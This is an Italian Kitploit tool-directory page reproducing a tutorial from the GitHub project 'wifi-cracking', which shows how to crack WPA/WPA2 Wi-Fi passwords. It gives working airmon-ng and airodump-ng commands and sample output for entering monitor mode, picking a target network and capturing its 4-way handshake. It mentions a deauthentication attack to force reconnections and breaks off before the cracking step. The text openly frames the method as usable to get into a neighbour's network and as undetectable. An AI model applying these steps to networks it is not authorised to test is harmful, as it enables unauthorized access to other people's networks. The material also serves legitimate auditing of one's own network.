Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
wifi-cracking — Decifra i router Wi-Fi WPA/WPA2 con Airodump-ng e Aircrack-ng/Hashcat | Kitploit
Strumenti/GitHubGitHub/brannondorsey/wifi-cracking
Password CrackingAuditing Wi-FiApprendimento e Formazione
GitHubbrannondorsey/wifi-cracking

wifi-cracking

Decifra i router Wi-Fi WPA/WPA2 con Airodump-ng e Aircrack-ng/Hashcat

Vedi Repository
12.6k1.2k1191 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Wi-Fi Cracking

Cracka router Wi-Fi WPA/WPA2 con Airodump-ng e Aircrack-ng/Hashcat.

Questo è un breve tutorial illustrativo che mostra come violare reti Wi-Fi protette con password deboli. Non è esaustivo, ma dovrebbe fornire informazioni sufficienti per testare la sicurezza della propria rete o per intrufolarsi in una vicina. L'attacco descritto di seguito è completamente passivo (solo ascolto, niente viene trasmesso dal tuo computer) ed è impossibile da individuare a patto che non utilizzi effettivamente la password che hai violato. Un attacco attivo opzionale di deautenticazione può essere usato per accelerare il processo di ricognizione ed è descritto alla fine di questo documento.

Se hai familiarità con questo processo, puoi saltare le descrizioni e passare direttamente all'elenco dei comandi in fondo. Per una varietà di suggerimenti e metodi alternativi, vedi l'appendice. neal1991 e tiiime hanno gentilmente fornito traduzioni di questo documento e dell'appendice in cinese, se preferisci quelle versioni.

DICHIARAZIONE DI NON RESPONSABILITÀ: Questo software/tutorial è solo a scopo educativo. Non dovrebbe essere utilizzato per attività illegali. L'autore non è responsabile per il suo uso. Non fare lo stronzo.

Per Iniziare

Questo tutorial presuppone che tu:

  • Abbia una certa dimestichezza con l'uso della riga di comando
  • Stia usando una distribuzione Linux basata su Debian, preferibilmente Kali Linux (gli utenti OSX vedano l'appendice)
  • Abbia Aircrack-ng installato
    • sudo apt-get install aircrack-ng
  • Possieda una scheda wireless che supporti la modalità monitor (vedi qui per un elenco di dispositivi supportati)

Violare una Rete Wi-Fi

Modalità Monitor

Inizia elencando le interfacce wireless che supportano la modalità monitor con:

airmon-ng

Se non vedi alcuna interfaccia elencata, la tua scheda wireless non supporta la modalità monitor 😞

Assumeremo che il nome della tua interfaccia wireless sia wlan0, ma assicurati di usare il nome corretto se differisce. Successivamente, mettiamo l'interfaccia in modalità monitor:

airmon-ng start wlan0

Esegui iwconfig. Ora dovresti vedere una nuova interfaccia in modalità monitor elencata (probabilmente mon0 o wlan0mon).

Trova il Tuo Target

Inizia ad ascoltare i Beacon frame 802.11 trasmessi dai router wireless vicini usando la tua interfaccia monitor:

airodump-ng mon0

Dovresti vedere un output simile a quello sotto.

CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49                                         
                                                                                                                                              
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                              
 14:91:82:F7:52:EB  -66      205       26    0   1  54e  OPN              belkin.2e8.guests                                                   
 14:91:82:F7:52:E8  -64      212       56    0   1  54e  WPA2 CCMP   PSK  belkin.2e8                                                          
 14:22:DB:1A:DB:64  -81       44        7    0   1  54   WPA2 CCMP        <length:  0>                                                        
 14:22:DB:1A:DB:66  -83       48        0    0   1  54e. WPA2 CCMP   PSK  steveserro                                                          
 9C:5C:8E:C9:AB:C0  -81       19        0    0   3  54e  WPA2 CCMP   PSK  hackme                                                                 
 00:23:69:AD:AF:94  -82      350        4    0   1  54e  WPA2 CCMP   PSK  Kaitlin's Awesome                                                   
 06:26:BB:75:ED:69  -84      232        0    0   1  54e. WPA2 CCMP   PSK  HH2                                                                 
 78:71:9C:99:67:D0  -82      339        0    0   1  54e. WPA2 CCMP   PSK  ARRIS-67D2                                                          
 9C:34:26:9F:2E:E8  -85       40        0    0   1  54e. WPA2 CCMP   PSK  Comcast_2EEA-EXT                                                    
 BC:EE:7B:8F:48:28  -85      119       10    0   1  54e  WPA2 CCMP   PSK  root                                                                
 EC:1A:59:36:AD:CA  -86      210       28    0   1  54e  WPA2 CCMP   PSK  belkin.dca

Ai fini di questa demo, sceglieremo di violare la password della mia rete "hackme". Ricorda l'indirizzo MAC BSSID e il numero del canale (CH) come mostrato da airodump-ng, poiché ci serviranno entrambi per il passaggio successivo.

Catturare un Handshake a 4 Vie

WPA/WPA2 utilizza un handshake a 4 vie per autenticare i dispositivi alla rete. Non devi sapere cosa significhi, ma devi catturare uno di questi handshake per poter violare la password di rete. Questi handshake avvengono ogni volta che un dispositivo si connette alla rete, ad esempio quando il tuo vicino torna a casa dal lavoro. Catturiamo questo handshake dirigendo airmon-ng a monitorare il traffico sulla rete target usando i valori del canale e del bssid scoperti dal comando precedente.

# sostituisci i valori di -c e --bssid con quelli della tua rete target
# -w specifica la directory dove salvare la cattura dei pacchetti
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
 CH  6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]                                        
                                                                                                                                              
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                              
 9C:5C:8E:C9:AB:C0  -47   0      140        0    0   6  54e  WPA2 CCMP   PSK  ASUS  

Ora aspettiamo... Una volta catturato un handshake, dovresti vedere qualcosa come [ WPA handshake: bc:d3:c9:ef:d2:67 in alto a destra dello schermo, appena a destra dell'ora corrente.

Se sei impaziente e ti senti a tuo agio nell'usare un attacco attivo, puoi forzare i dispositivi connessi alla rete target a riconnettersi, inviando loro pacchetti di deautenticazione malevoli. Questo spesso porta alla cattura di un handshake a 4 vie. Vedi la sezione sull'attacco deauth qui sotto per informazioni.

Una volta catturato un handshake, premi ctrl-c per uscire da airodump-ng. Dovresti vedere un file .cap nella directory in cui hai detto a airodump-ng di salvare la cattura (probabilmente chiamato -01.cap). Useremo questo file di cattura per violare la password di rete. Mi piace rinominare questo file per riflettere il nome della rete che stiamo cercando di violare:

mv ./-01.cap hackme.cap

Violare la Password di Rete

Scarica lo strumento